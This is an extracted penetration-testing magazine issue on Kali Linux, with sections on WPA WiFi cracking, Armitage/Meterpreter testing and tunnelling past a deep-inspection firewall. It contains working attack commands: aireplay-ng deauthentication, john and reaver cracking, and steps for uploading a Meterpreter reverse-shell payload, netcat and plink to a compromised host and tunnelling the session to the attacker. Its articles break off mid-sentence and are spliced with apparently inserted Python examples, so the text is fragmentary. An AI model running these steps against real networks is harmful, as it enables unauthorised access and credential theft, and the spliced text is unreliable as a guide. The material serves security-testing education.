Improve your Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices.
www.titania.com
With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customers' specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own company's styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself, evaluate for free at titania.com
Dear PenTest Readers!

And this is it! Enjoy your reading, enjoy your PenTest!

Milena Bobrowska and PenTest Team

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes.

DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
KALI LINUX INTRODUCTION
Kali Linux is a penetration testing and security auditing Linux distribution. After its release in March 2013, Kali Linux has quickly become the new favorite among PenTesters worldwide as their choice for the PenTesting OS. Replacing its predecessor Backtrack, Kali incorporated several new features and looks quite promising. It is available for i386 and amd64 architectures and has the same Minimum Hardware Requirements as Backtrack: 1 GHz CPU, 8 GB of Hard Disk Space, 300 MB RAM, and a DVD-writer or the ability to boot from a pen drive.

A Little History
To be very concise, Kali is an offshoot of Backtrack, which is an offshoot of Whax, which is itself an offshoot of Whoppix, which is derived from Knoppix. Something common among all of these distros is that they were focused on Digital Forensics and Intrusion Detection, with Backtrack and Kali adding a whole lot of tools for PenTesting purposes. Backtrack has been giving machine guns to monkeys since 2007, so it has had a long reign as the favorite distro of PenTesters worldwide. Offensive-Security, the creators of Backtrack, decided to incorporate many changes in the new Backtrack 6 (as it was called at that time). Since it was built from scratch, it was significantly different from the older versions of Backtrack and Offensive-Security decided to give the distro a new name: Kali Linux.
SCENARIOS
Kali Linux
The BackTrack Successor

On March 13, Kali, a complete rebuild of BackTrack Linux, was released. It has been constructed on Debian and is FHS (Filesystem Hierarchy Standard) compliant. It is an advanced Penetration Testing and Security Auditing Linux distribution. It adheres completely to Debian development standards. However, one should not treat Kali Linux exactly the same as Debian.
BackTrack is an open-source Linux-based penetration testing toolset. In BackTrack, the common tools that you needed to perform a security assessment were all packaged into one nice distribution and ready to go at a moment's notice. BackTrack made it easy to create a new VM (Virtual Machine) from the downloaded ISO (International Organization for Standardization) image, perform the assessment, then either archive that VM for future reference or delete it when done to remove the evidence.

Where BackTrack was built on Ubuntu, Kali Linux is built from scratch and constructed on Debian and is FHS (Filesystem Hierarchy Standard) compliant. Improved software repositories synchronized with the Debian repositories make it easier to keep it updated, apply patches and add new tools. Kali Linux can also be easily customized so that it contains only the packages and features that are required. The desktop environment can also be customized to use GNOME (default), KDE (K Desktop Environment), LXDE (Lightweight X11 Desktop Environment), or whatever you prefer.
Some Other Differences

- Single user, root access by design: Since it has been designed for security auditing, Kali Linux is designed to be used in a single, root user scenario.
- Network services disabled by default: Major security threats come from various network services running on the system. Kali Linux is equipped with sysvinit hooks which disable network services by default. These hooks allow us to install various services on Kali Linux, while ensuring that our distribution remains secure by default, no matter what packages are installed. Additional services such as Bluetooth are also blacklisted by default.
- Custom Linux Kernel: Kali Linux uses an upstream kernel, patched for wireless injection.

Kali is a Linux distribution specifically geared towards professional penetration testing and security auditing, and as such it is not a recommended distribution for those unfamiliar with Linux. Misuse of security tools within your network, particularly without permission, may cause irreparable damage and result in significant consequences.

NOTE
If you are looking for a Linux distribution to learn the basics of Linux and need a good starting point, Kali Linux is not the ideal distribution for you. You may want to begin with Ubuntu or Debian instead.

Creating the Virtual Machine

Launch VirtualBox and using Virtual Machine Manager create a new virtual machine by clicking New in the upper left corner.

Provide a Name for the virtual machine, OS (Operating System) Type and Version. Set the Type to Linux and the Version to Debian. Please make sure to choose the proper 32 or 64 bit option for your architecture. Once completed, click the Continue button to move on with the setup.

Configure the amount of memory to allocate to your new virtual machine. As a minimum allocate 2048MB. Once completed, click the Continue button.

The next step is to create the virtual machine hard drive. The default is to Create a virtual hard drive now. Accept the default and click the Create button in the lower right portion of the window.

Pick your hard drive file type. The default is VDI (VirtualBox Disk Image), however you can create any other type. For example, creating a VMDK (Virtual Machine Disk) will allow you to use this hard drive with VMware as well as VirtualBox. Once you have selected your file type, click the Continue button.

The next step gives you two options: to allocate the entire amount of disk space at once, OR dynamically allocate as hard drive space is needed. Once you have made your selection, click the Continue button.
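The "Network services disabled by default" item earlier in this article rests on a hook that the init system consults before it starts a service: nothing listens unless an operator has deliberately allowed it. The following added example is not Kali's own hook and not code from the article; it is a Python version of such a hook modelled on Debian's documented policy-rc.d interface, where invoke-rc.d calls the hook with the service name and the requested action and refuses the action when the hook exits 101. The allow-list contents are an assumption an administrator would edit.

```python
#!/usr/bin/env python3
"""Allow-list service policy modelled on Debian's policy-rc.d interface.

Added example, not Kali's own hook. Assumption: invoke-rc.d calls this
script as `policy-rc.d <service> <action(s)> [<runlevel>]` and treats
exit code 101 as "action forbidden", which is the documented interface.
"""
import sys

# Constructed allow-list: only services an operator has deliberately
# enabled may start. Everything else stays off, whatever gets installed.
ALLOWED_SERVICES = {"ssh"}

# Actions that never open a listening socket; always permitted so that
# packages can still be stopped, queried and removed cleanly.
SAFE_ACTIONS = {"stop", "status"}

# Exit codes from the policy-rc.d specification.
EXIT_ALLOW = 0
EXIT_FORBID = 101
EXIT_SYNTAX = 103


def decide(service, actions, allowed=ALLOWED_SERVICES):
    """Return the exit code for a request to run `actions` on `service`.

    `actions` is a space-separated list (the spec permits more than one);
    a single forbidden action makes the whole request forbidden.
    """
    if not service or not actions:
        return EXIT_SYNTAX
    for action in actions.split():
        if action in SAFE_ACTIONS:
            continue
        if service not in allowed:
            print(f"policy-rc.d: refusing '{action}' for {service} "
                  "(not in allow-list)", file=sys.stderr)
            return EXIT_FORBID
    return EXIT_ALLOW


def main(argv):
    """Command-line entry point: argv[1] is the service, argv[2] the action(s)."""
    if len(argv) < 3:
        return EXIT_SYNTAX
    return decide(argv[1], argv[2])


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Installed as /usr/sbin/policy-rc.d and made executable, a hook like this makes `invoke-rc.d apache2 start` fail with "action forbidden" while `invoke-rc.d apache2 stop` still works; the point of the design is that installing a package can no longer silently add a listener.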
Kali Linux
WiFi Testing
In this article, we will explore penetration testing of a wireless 802.11 (WiFi) network using Kali Linux. We will limit our testing to WPA, which is of more interest to professionally secured WiFi networks. It is also beneficial for us to focus on the command-line tools in order to provide a better understanding of the steps involved.
This will help us gain a deeper understanding which will help us to adapt our testing beyond standard recipes. The following general steps will be followed in order to better perform a WiFi security assessment and to afterward further lock-down our systems.

1. Verify our equipment and setup.
2. Monitor the WiFi networks to obtain information about our access point (AP) under test.
3. Capture AP key exchanges while injecting packets to force re-authentication.
4. Perform off-line key-cracking techniques on the captured data.
5. Use the results to improve security at our AP.
6. Repeat steps 3-5 until satisfied with the security.

As we go through these steps, we will utilize various tools provided by the Kali Linux distribution. We also are able to script these tools together and create our own utilities as needed to aid in our penetration testing. We will also briefly explore WPS exploitation, but only enough to demonstrate that WPS must be disabled for proper security.

WiFi Security
One of the things we must understand before attempting to secure our WiFi network is how it is naturally protected. WiFi networks borrow from decades of research in the field of cryptography, but also borrow some of the problems inherent in secure communication systems.

Cryptographic systems have often solved the security problem quite easily by using encrypted data streams and the latest cryptographic technologies. Encrypting a data stream with a secret key and decrypting it with the same key works out quite well and can provide a high level of protection, provided that certain protocols are followed. However, there is much difficulty introduced in the simple method of sharing the secret key.

Sharing a secret key or private key has been the target of much research and development as well as the focal point in various security attacks. Ideally, if you could share a private key in a private manner, the highest level of security is obtained. This might involve two people meeting in a secret place and handing one to another a secret key written on a piece of paper. The key is then programmed into another system, the paper is properly destroyed, and the secret key is to remain a secret and never be shared where prying eyes could observe. Although this is quite secure, it is also highly impractical.

In lieu of the previous option, we are now introduced with the problem of key exchange. Cryptographic systems often need a way to share a key,
Kali Linux is installed to a virtual machine in order to allow the main PC or notebook to still have access to the network. A separate external WiFi dongle is needed. If operating in a virtual machine, the USB dongle needs to be assigned to the VM. The following WiFi dongle will be used:

[13134.967038] usb 1-1: new high-speed USB device number 10 using ehci_hcd
[13135.124983] usb 1-1: New USB device found, idVendor=07b8, idProduct=3070
[13135.124986] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[13135.124987] usb 1-1: Product: 802.11 n WLAN
[13135.124988] usb 1-1: Manufacturer: Ralink
[13135.124989] usb 1-1: SerialNumber: 1.0
[13135.303101] usb 1-1: reset high-speed USB device number 10 using ehci_hcd
[13135.551689] ieee80211 phy6: Selected rate control algorithm minstrel_ht
[13135.552002] Registered led device: rt2800usb-phy6::radio
[13135.552023] Registered led device: rt2800usb-phy6::assoc
[13135.552042] Registered led device: rt2800usb-phy6::quality

root@kali:~# ifconfig wlan0 down

Check that it is no longer present: Listing 3.

root@kali:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1c:42:41:9c:da
          inet addr:10.211.55.8  Bcast:10.211.55.255  Mask:255.255.255.0
          inet6 addr: fdb2:2c26:f4e4:0:21c:42ff:fe41:9cda/64 Scope:Global
          inet6 addr: fe80::21c:42ff:fe41:9cda/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:12406 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6598 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:17247605 (16.4 MiB)  TX bytes:424667 (414.7 KiB)

root@kali:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1c:42:41:9c:da
          inet addr:10.211.55.8  Bcast:10.211.55.255  Mask:255.255.255.0
          inet6 addr: fdb2:2c26:f4e4:0:21c:42ff:fe41:9cda/64 Scope:Global
          inet6 addr: fe80::21c:42ff:fe41:9cda/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:12409 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6598 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:17248418 (16.4 MiB)  TX bytes:424667 (414.7 KiB)
BSSID              STATION            PWR   Rate     Lost  Frames  Probe
28:C6:8E:69:A7:EE  00:15:E9:F9:76:9B  -76   1 -36    0     9
28:C6:8E:69:A7:EE  28:CF:E9:15:FD:C7  -16   1e- 1e   0     7

One thing to note is if the broadcast de-authentication does not work, you should try it again with the -c option to single out specific devices to de-authenticate.

root@kali:~# aireplay-ng mon0 -a 28:C6:8E:69:A7:EE -0 1 -c 28:CF:E9:15:FD:C7
15:59:15  Waiting for beacon frame (BSSID: 28:C6:8E:69:A7:EE) on channel 11
15:59:16  Sending 64 directed DeAuth. STMAC: [28:CF:E9:15:FD:C7] [26|61 ACKs]

Of course, if you are attacking your own network, you simply need to use the MAC address of a known laptop on your network without having to wait and learn which devices are using the WiFi network.

In short, we need to capture a WPA handshake. We can obtain this handshake by simply waiting until it naturally occurs or we can provoke a device into performing this handshake by injecting fake packets that ask it to de-authenticate and thus re-authenticate. Once we are able to provoke a WPA handshake, we are ready to repeat these tests with logging enabled, so that we can capture this data for off-line processing.

Additionally, there are other methods of injection, of which some are a bit trickier and some are only supported for WEP mode. If mode -0 fails, you may want to try one of the other methods or simply wait until a device is legitimately connected to the WiFi network.

Putting it All Together
Now that we are able to capture a key exchange, we will repeat this process while logging the captured data. We purposely did not log to a file so that we can investigate what works and obtain some ESSIDs that might be susceptible to de-authentication requests. This allows us to avoid accumulating large amounts of data until we are truly ready to begin. Everything up to this point was mostly exploratory and now we begin the real work. Let's first stop the airodump (CTRL-C) and restart it with logging enabled.

Figure 3. Targeted Airodump Scan Output

The -w option tells it to dump the captured data to a capture file. This file will be used in our password cracking attempts. Now that it is running, attempt the injection again:

root@kali:~# aireplay-ng mon0 -a 28:C6:8E:69:A7:EE -0 1

You may want to replace the injection command above with the one that worked on your system. Next we wait for airodump-ng to report a WPA handshake, then press CTRL-C. Now we should see our capture files:

root@kali:~# ls myfiles*
myfiles-01.cap  myfiles-01.csv  myfiles-01.kismet.csv  myfiles-01.kismet.netxml

The three files, myfiles-01.csv, myfiles-01.kismet.csv, and myfiles-01.kismet.netxml, are simply variations of the data we see when running it live. It is myfiles-01.cap where the full data lies.

Now that we have a capture file that contains a WPA handshake, we are done with the WiFi network. The remaining testing will be concerned with uncovering the password of our network by using only the captured file. The password cracking may take quite a bit of time, but it can be done offline and in the background. It is important to remember that intruders often have much time and computing power. In order to protect against this, we need to be willing to give some time to our crackers in order to verify that we are secure.

Password Cracking
Inside the myfiles-01.cap file, we have the data which contains a WPA handshake or key exchange. Within this handshake we have, in essence, an encrypted version of our WiFi password. It is this password that we seek and now we need to work on this file until we can extract the password. Since we have an encrypted password, the only reasonable method we can use to obtain it is
root@kali:~# john -w:dic-0294.txt -stdout -rules

It is not necessary to keep cracking our WiFi network at this time as we can simply use john to see if our password is solid. Let's start with deadbeef again and check it with john (Figure 5).

root@kali:~# john -w:dic-0294.txt -stdout -rules | grep deadbeef

As we can see, deadbeef is guessed along with many other variations. Ideally we might want to find a password that john won't even guess, but there is also the matter of how long it will take to guess it. Even if john can guess the password, how long will it take? Is it long enough for us to consider our system secure? Furthermore, we can modify john's rules to create more elaborate alterations of passwords or even create a python script that does exactly what we want. In short, if we don't know the password, we simply use john or a custom tool to create a password list that is piped into aircrack-ng:

Figure 5. John Password Generation

Reaver
A WiFi attack discussion is not complete without talking about reaver. Reaver is a utility that takes advantage of WPS to almost certainly discover

Once this has shown that we are authenticated, we leave it running and in another terminal, start reaver.

root@kali:~# sudo reaver -i mon0 -A -b 28:C6:8E:69:A7:EE -vv

We may need to experiment with the -S, -N, and/or -L options to get it to work. We experiment until we find some settings of reaver that show progression of the pin attempts. Next, we would let it run for several hours and we are almost guaranteed to obtain the password. Reaver will continue until the password is found.

Locking the System Down
We have so far gone through the exercise of testing WiFi susceptibility to various attacks with the purpose of assessing our WiFi network. At the end of these exercises we must come up with some measures that allow us to prevent these attacks from outsiders. Although we cannot completely lock down any system that selectively allows outside access, our goal should be to stay
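The "Password Cracking" section and the john test above rest on the same two facts: the only way from a captured handshake back to the passphrase is to try candidates, and each candidate costs one PBKDF2 derivation. The following added example (not code from the article, and not john or aircrack-ng) shows both halves in Python: the 802.11i PMK derivation, checked against the standard's published test vector, and a small john-style rule set that lets an owner test whether a chosen passphrase is a cheap variation of a dictionary word, with a time-to-exhaust estimate at an assumed guess rate. The rule set, the wordlist and the guess rate are constructed assumptions, not measurements.

```python
"""WPA2 passphrase audit: PMK cost and dictionary-rule coverage.

Added example, not the article's code and not john or aircrack-ng.
"""
import hashlib


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes),
    as IEEE 802.11i specifies for WPA/WPA2-Personal. The standard limits
    the passphrase to 8..63 ASCII characters; hashlib does not, so we do."""
    if not 8 <= len(passphrase) <= 63 or not passphrase.isascii():
        raise ValueError("WPA passphrase must be 8-63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


# Constructed john-style rule set: case changes, leet substitution,
# reversal, then a handful of common suffixes on every variant.
_LEET = str.maketrans("aeios", "43105")
_SUFFIXES = ("", "1", "123", "!", "2013")


def mangle(word: str) -> set:
    """All candidates the rule set produces from one base word."""
    cases = {word, word.lower(), word.upper(), word.capitalize()}
    variants = set(cases)
    for w in cases:
        variants.add(w.translate(_LEET))
        variants.add(w[::-1])
    return {v + s for v in variants for s in _SUFFIXES}


def candidates(wordlist):
    """Distinct candidates from a whole wordlist (what gets piped to a cracker)."""
    seen = set()
    for word in wordlist:
        for c in mangle(word):
            if c not in seen:
                seen.add(c)
                yield c


def derivation_of(passphrase: str, wordlist):
    """The base word from which the rules derive `passphrase`, or None."""
    for word in wordlist:
        if passphrase in mangle(word):
            return word
    return None


def audit(passphrase: str, ssid: str, wordlist, guesses_per_second: float) -> dict:
    """Report whether the passphrase falls to wordlist+rules and how long
    exhausting the candidate space takes at the assumed guess rate."""
    total = sum(1 for _ in candidates(wordlist))
    return {
        "pmk": wpa2_pmk(passphrase, ssid).hex(),
        "candidates": total,
        "seconds_to_exhaust": total / guesses_per_second,
        "derived_from": derivation_of(passphrase, wordlist),
    }


# Constructed sample wordlist; a real audit would use a large dictionary.
SAMPLE_WORDLIST = ["deadbeef", "password", "kali", "linux"]

if __name__ == "__main__":
    for pw in ("deadbeef", "D34db33f1", "correct horse battery"):
        print(pw, audit(pw, "TestNet", SAMPLE_WORDLIST, 1000.0))
```

The 4096-iteration PBKDF2 is why offline cracking is measured in guesses per second rather than millions per second: the cost is per candidate, so the defender's lever is the size of the candidate space, which is what `derived_from` reports on. A passphrase that `derivation_of` returns None for is only as safe as the rules you tried; widen the rule set before trusting the result.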
In the same way and same line of thought, penetration testers and hackers have that inkling or feeling when they first fire up Kali Linux. Security Tools. Lots of Security Tools. The entire distribution is built from the ground up for penetration testers and hackers. It comes preloaded with numerous security tools that are installed, configured, and ready to be used. Kali Linux is the new generation of the industry-leading BackTrack Linux penetration testing and security auditing Linux distribution. Many penetration testers and serious hackers use Linux-based open source penetration test tools from which to launch their attacks. Kali Linux contains a number of tools that can be used by security professionals during a security assessment process and vulnerability assessment. In this
[Figure residue: an encoding table with Hex, Base64 and MD5 rows whose values did not survive extraction.]
Figure 14. OWASP-ZAP
Figure 20. Hydra GUI (xHydra) in Kali
Figure 22. Burp suite
Penetration Testing
with Linux
Penetration testing with Linux is one of the best ways to perform
tests. It is a versatile tool. Linux comes in many flavors like
Backtrack5 RC3 or now Kali. Linux allows the customization of
the software itself plus the tools that you use. Therefore, the
customization and level of sophistication is limitless. This article
will cover using Backtrack5 RC3 and Armitage as it is executed
during the pentest.
This article may not cover all features of Armitage. However, in order to provide you a better understanding of Armitage, Kali will be used as well in different screenshots. Note that Armitage is no longer supported under Backtrack with the recent release of Kali in early 2013. We chose to use Kali in this article to show you something recent, but the other versions of Linux are still very good tools to use in the field.

Backtrack comes loaded with metasploit and as you know in order to find and run an exploit you have to switch to the directory and run the com-
Listing 3. Results: Images from core business application were not being sent to our laptop despite driftnet running
Also the GUI was used to pick target client Windows 7 machine 10.10.10.7 and second target the application server 10.10.10.5 (Listing 1).

Results with sslstrip
No data or text of any sort was visible, since all data was being passed through an encrypted channel.

Results with dsniff
Web addresses were visible, but no usernames or passwords. These results show that the application is very secure.

Results with driftnet
There were no pictures or images of the site going across. There were web addresses being listed.

Results with urlsnarf
The only thing that came through here was some local address space and some internet address space, redacted for publication. Still there were no real gems of information for quick gains (Listing 2).

Executed commands (example):

Results
We were able to log keystrokes and take screen shots of the user's computer. This is one way data could be captured. In this test, we show that key logging and screen captures are possible; however, they are not very effective, as shown in Figure 7. Anything that was operating on the application level of the OSI model remained visible and the tool worked. When things went encrypted at the network level it was impossible to see (Figures 4-7).

We have seen before that the desktop can be captured with screen shots and information could be leaked this way. However, notice in Figure 7 that the application icon is present as a big S in the toolbar, and on the workstation it is in the foreground. However, the image reveals that it is not seen and therefore encrypted to the reverse tcp shell. That S represents the business's core business application. The launch html page is the only visible part of the application, which is done on port 80. This demonstrates that the application running on the computer was able to encrypt all activity for queries, results, and navigation.
Meterpreter
With Meterpreter used with Armitage, the connection made it impossible to glean any data or provide a way to leak data out; Meterpreter was used in this test. Knowing the administrator password, the connection was possible. Even a regular user with a known password would be able to both pass the hash dump and crack passwords later in order to attempt to escalate privileges. Time is the factor in how successful the cracker would be by going slow and password cracking.

Figure 5. Email Credentials Entered
At this point, my attack vector was very clear:

- Upload and run a meterpreter payload to get a remote session.
- Escalate privileges on the remote host.
- Capture the hash of the Administrator to use it on other hosts.
- Use a Delegation Auth Token of a Domain Admin user to impersonate it, and use it to create a Domain Administrator user.
- Use the host as a gateway to access other hosts and servers on the LAN.

By testing the above attack vector, some problems were detected that had to be solved to achieve the ultimate goal.

The main problem was that after getting a reverse meterpreter payload onto the host and running it, the reverse connection did not reach its destination. My first thought was that a firewall was blocking access to unusual ports, so I repeated the process, this time using a payload trying to connect to port 80 of my machine, but that did not work either.

The same test using netcat worked, so I figured out that the problem was related to the firewall blocking meterpreter packets, probably because it is a Deep Inspection Firewall with the signatures of meterpreter in its signature file.

To solve the problem, I used encryption, since a firewall can only inspect packets in the clear, not encrypted ones. To ensure packets were encrypted end-to-end (from the compromised machine to my local machine), I used an SSH tunnel, successfully achieving my goal of bypassing that security barrier.

In this article I will try to explain step by step all the processes involved to bypass the deep inspection firewall and achieve a meterpreter session with the remote host. The reason for wanting a meterpreter session is the ease with which you can escalate privileges and pivot to other hosts from the Metasploit Framework.

The process is summarized as follows:

- Raise the necessary tools to the remote host.
- Establish an ssh tunnel forwarding the needed ports.
- Launch the meterpreter payload through the tunnel.
- Receive the meterpreter session on the other side of the tunnel.

How to upload the payload?
When we have access to a Linux system, we usually have no problem uploading files to it, because normally any Linux distribution comes with wget or curl, so we just need a web server to publish the binaries
ssh -L <local port>:<remote host>:<remote port> <gateway>

ssh -R <server port to open>:<remote host>:<remote port> <server>

This example creates a SOCKS proxy on port 9050 on the local host from which we can reach any port of any host within the SSH Server LAN (we can reach any host the SSH Server host can reach).

Following with the same scenario, now we configure proxychains to use port 9050 of localhost, and then reach the terminal server at 192.168.0.11 with the following command:

root@kali:~# proxychains rdesktop 192.168.0.11

OpenSSH and Putty
After seeing how SSH tunnels work, it is quite clear what we need to make the connection from the remote host to our attacking host: local port forwarding to open a port on the remote host that connects to a port of our local host.

SSH is an interactive command. When we invoke it to connect to a remote host, it first checks the RSA signature of the host and, if it does not know that host, asks if you want to connect. If yes, it then asks the password for the user you specified when invoking the command.

When working from a console achieved via netcat or directly from SQL injection, we can't use this type of interactive command because we do not have access to the various standard file descriptors and therefore the command will wait for a response that can not be sent.

To fix this, we can invoke ssh (we're talking specifically about OpenSSH, which is the most widely used SSH package on Linux, http://www.openssh.org/) with -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no so that it does not check the signature of the remote server, and also, in the case of ssh on Unix/Linux, we can put the public RSA key of the user who attempts to connect to the remote host in the file .authorized_keys so we are not asked for the password.

In this case, we will use plink.exe from Windows. Here you can specify -l user -pw password to pass the username and password without having to copy the RSA keys.

Plink is the command line version of an SSH client known as Putty, widely used in Windows environments. Plink offers no parameter to avoid checking the server key, so the first time we connect to a new host it will show the save RSA message.

C:\>echo y | plink.exe -l user -pw password SSH-SERVER

The command will invoke plink.exe and when asked if you want to add the unknown server key to the cache, it will pass the character y and plink will save the key and go on with its normal execution. From then on, we have the remote host key in the host's putty cache, which can be found in the Windows registry, in the key HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys. If you need to open a second SSH tunnel against the same host, the echo y is no longer necessary.

Well, suppose the following scenario (for demo purposes we use two private IP address ranges; 10.10.0.x stands for public addresses):

Public IP attacker machine: 10.10.0.10
Firewall public IP: 10.10.0.20
Network IP LAN: 192.168.65.0/24
Private IP Firewall: 192.168.65.254
Private IP of host behind the firewall: 192.168.65.10
Private IP of second host behind the firewall: 192.168.65.15

First, we create our meterpreter payload pointing to port 6666 of 127.0.0.1 (localhost). This payload, when invoked from a Windows host, will make a connection to itself (127.0.0.1) on port 6666.

Figure 2. The creation of a meterpreter reverse tcp shell in binary form with msfvenom

We upload this payload, plink.exe and nc.exe to the victim host. Once the three files are uploaded, first make a connection with netcat to have a console where we can execute commands, because that will always be more comfortable than any SQL injection or PHP shell.

Figure 3. Establish a remote session using netcat

Note that the connection to our host comes from 10.10.0.20, but the IP of the remote host is 192.168.65.10. That is because the host is behind a NAT Firewall.

Now using plink.exe we must create an SSH tunnel to connect port 6666 of the remote host (compromised host) to port 6666 on the local host (port numbers can be any, but then you have to create the payload to use those you decide).

Figure 6. Configuration of the Metasploit multi handler to get the reverse meterpreter session

Once the entire stage is set, just execute the payload met.exe on the remote box. Once executed, the handler on the local host will receive the connection and send the stage for opening the session. The following picture shows it.
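The OpenSSH and Putty section above switches off host-key checking (`StrictHostKeyChecking=no`, `UserKnownHostsFile=/dev/null`, or piping `y` into plink) because the session is non-interactive. What that discards is the only protection the client has against handing its password to an impostor server sitting in the path. The following added example is not OpenSSH's or PuTTY's code; it is a Python reading of the OpenSSH known_hosts format (plain and HashKnownHosts entries) that makes the decision a strict client makes before authenticating: is the offered key the one pinned for this host? The sample keys, salt and known_hosts text are constructed; the firewall address reuses the scenario above.

```python
"""SSH host-key verification: the check that StrictHostKeyChecking=no gives up.

Added example, not OpenSSH's code. Reads OpenSSH known_hosts syntax,
including HashKnownHosts entries of the form |1|<salt>|<HMAC-SHA1(salt, host)>.
"""
import base64
import hashlib
import hmac


def fingerprint_sha256(key_b64: str) -> str:
    """OpenSSH-style fingerprint: SHA256 of the raw key blob, base64, no padding."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def hash_hostname(host: str, salt: bytes) -> str:
    """Build a HashKnownHosts host field from a hostname and a 20-byte salt."""
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return "|1|" + base64.b64encode(salt).decode() + "|" + base64.b64encode(mac).decode()


def host_matches(pattern: str, host: str) -> bool:
    """True if a known_hosts host field (plain list or hashed) names `host`."""
    if pattern.startswith("|1|"):
        _, _, salt_b64, _mac_b64 = pattern.split("|", 3)
        salt = base64.b64decode(salt_b64)
        return hmac.compare_digest(hash_hostname(host, salt), pattern)
    return host in pattern.split(",")   # plain entries may list several names


def check_host_key(known_hosts: str, host: str, keytype: str, key_b64: str) -> str:
    """'match' if the offered key is pinned for host; 'mismatch' if the host is
    known with a different key of this type (the impostor case a strict client
    refuses); 'unknown' if nothing is pinned for the host and key type."""
    host_known = False
    for line in known_hosts.splitlines():
        fields = line.split()
        # Skip blanks, comments and @cert-authority / @revoked markers (not handled here).
        if len(fields) < 3 or fields[0].startswith("#") or fields[0].startswith("@"):
            continue
        pattern, ktype, kdata = fields[:3]
        if ktype != keytype or not host_matches(pattern, host):
            continue
        host_known = True
        if hmac.compare_digest(kdata, key_b64):
            return "match"
    return "mismatch" if host_known else "unknown"


def _fake_ed25519(seed: int) -> str:
    """Constructed key blob in ssh-ed25519 wire layout (string + 32 bytes); not a real key."""
    blob = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes((seed + i) % 256 for i in range(32))
    return base64.b64encode(blob).decode()


KEY_GATEWAY = _fake_ed25519(1)      # the key we pinned
KEY_IMPOSTOR = _fake_ed25519(200)   # a different key offered for the same name
_SALT = bytes(range(20))            # constructed; OpenSSH draws 20 random bytes

# Constructed known_hosts: one hashed entry, one plain entry for the scenario's firewall.
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# pinned host keys (constructed sample)",
    hash_hostname("gateway.example", _SALT) + " ssh-ed25519 " + KEY_GATEWAY,
    "192.168.65.254,fw.example ssh-ed25519 " + KEY_GATEWAY,
])

if __name__ == "__main__":
    print(fingerprint_sha256(KEY_GATEWAY))
    for name, key in (("gateway.example", KEY_GATEWAY), ("gateway.example", KEY_IMPOSTOR),
                      ("other.example", KEY_GATEWAY)):
        print(name, check_host_key(SAMPLE_KNOWN_HOSTS, name, "ssh-ed25519", key))
```

The non-interactive case the article runs into has a strict answer that does not need `/dev/null`: pre-populate a known_hosts file with the expected entry (or pin the fingerprint out of band) and keep `StrictHostKeyChecking=yes`, so a 'mismatch' aborts the connection instead of being answered with `y`.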
Kali Linux is designed as a single-purpose tool-kit for network penetration testing and forensic audit, so it is missing some of the more general applications. There are no games visible in the main menu on Kali by default, though you might have so much fun with the content of the Kali directory (Figure 2) that you never really notice the lack. The security applications are listed by category and subcategory. There are 432 tools, more or less. Some of the tool links are to sections of a single tool, for instance: there are several links to different areas of the Metasploit Framework; and there are links to start and stop Apache2 HTTPD, MySQL, Metasploit, OpenVAS, BeeF, Dradis and the SSH-server. As you will see below, Metasploit Framework gets its own subcategory.

Kali Categories and Sub-Categories
Top 10 Security Tools

Review
From hosts to users to emails and messages to infrastructure and even weapons, Maltego gives you a way to visualize your environment in a very information-rich way. Maltego lets you track relationships and entities in 11 different ways and lets you visualize them all three ways: main view, bubble view and as an asset list. Very interesting tool.

Metasploit Framework
http://www.metasploit.com/

Figure 6. Metasploit

The first time you go to https://localhost:3790/ you see a new-user registration. Once your password is approved, Metasploit lets you insert the key code you got through registering on their site.
Description (from the project site)
Reduce the risk of a data breach by download-
ing our penetration testing solutions. Discover how
vulnerabilities become real risks as you test the
defenses of your own network, using the same
methods as an outside attacker. Our penetration
testing software gives you a clear view as to what
vulnerabilities can easily be exploited within your
environment so you can focus on the most critical
vulnerabilities.
Safely simulate attacks on your network to un-
cover pressing security issues. Use with Nexpose
to assess and validate security risks in your en-
vironment. Verify your defenses, security controls
and mitigation efforts. Manage phishing exposure,
and audit web applications.
Review
Figure 8. Nmap NMap, which has been around since 1996, is one
of the main open-source tools in any network ad-
